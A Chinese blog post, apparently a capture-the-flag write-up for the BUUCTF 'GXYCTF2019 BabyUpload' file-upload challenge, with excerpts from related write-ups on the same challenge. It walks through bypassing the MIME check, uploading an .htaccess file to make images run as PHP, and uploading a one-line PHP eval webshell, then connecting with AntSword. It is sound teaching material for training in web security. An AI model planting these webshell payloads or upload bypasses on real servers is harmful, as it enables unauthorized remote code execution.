BUUCTF之BabyUpload[GXYCTF2019]

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量593 收藏 1
点赞数
分类专栏: CTFのWriteUp 文章标签: CTF 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/125236838
版权

直接开burpsuite,抓包上传点,老规矩先传配置文件

 

右键发送到重复器(Repeater),切到重复器,点击发送

png后缀也传不了???

可能是文件名或者是后缀名或者是文件类型Content-Type或者是文件内容不符合,这里一个个测试,先测试全部常见的图片后缀(png、jpg、jpeg、gif)

发现还是不行,接着后缀名保持png,测试Content-Type,发现上传成功

把文件后缀删掉上传

 

 

 对MIME头白名单过滤了,也只接受jpeg类型,但是似乎也没有对后缀进行严格的过滤,也就过滤了ph

 既然配置文件上传成功,就直接上传马吧

发现过滤掉了<?,那就换种php格式

<script language="php"> @eval($_POST["x"]);</script>

 

上传成功,根据回显,得到文件上传的地址

 上蚁剑连接,发现连接不成功,尴尬了,回头看才知道.htaccess配置文件不能上文件头,把文件头去掉再上传

 蚁剑连接成功

 拿到flag

金 帛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 602
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1890
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF---web---[GXYCTF2019]BabyUpload
最新发布
2201_75556700的博客
05-19 148
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 89
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传题的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传题。在根目录下即可获得flag。还是用以前总结出来的方法。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 703
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1539
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3411
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
buuctf-BabyUpload
m0_62094846的博客
03-26 890
上传php文件,过滤后缀 上传jpg文件 上传png文件,和文件类型有关(Content-Type) 所以应该要上传jpg文件类型 上传一句话木马就会出现问题,筛查后发现是<?php 改一下木马格式就可以了 <script language="php">eval($_REQUEST[value])</script> 但是后缀无法修改成php类型,各种方式都试过了 想到.htaccess和.user.ini 和文件类型有关,就修...
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 862
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
Buuctf-[GXYCTF2019]BabyUpload
m0_63563528的博客
04-26 199
buuctf文件上传题
【web | CTF】BUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 323
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问题在Content-Type里,只能上传 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上传.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上传。某文件变成php来执行。
web buuctf [GXYCTF2019]BabyUpload1
weixin_44214568的博客
03-22 809
考点:.htaccess文件, 抓包修改content-type 文件上传漏洞 1.如题: 传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下: GIF89a?<script language="php">@eval($_POST[dd]);</script> 2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2438
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1163
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值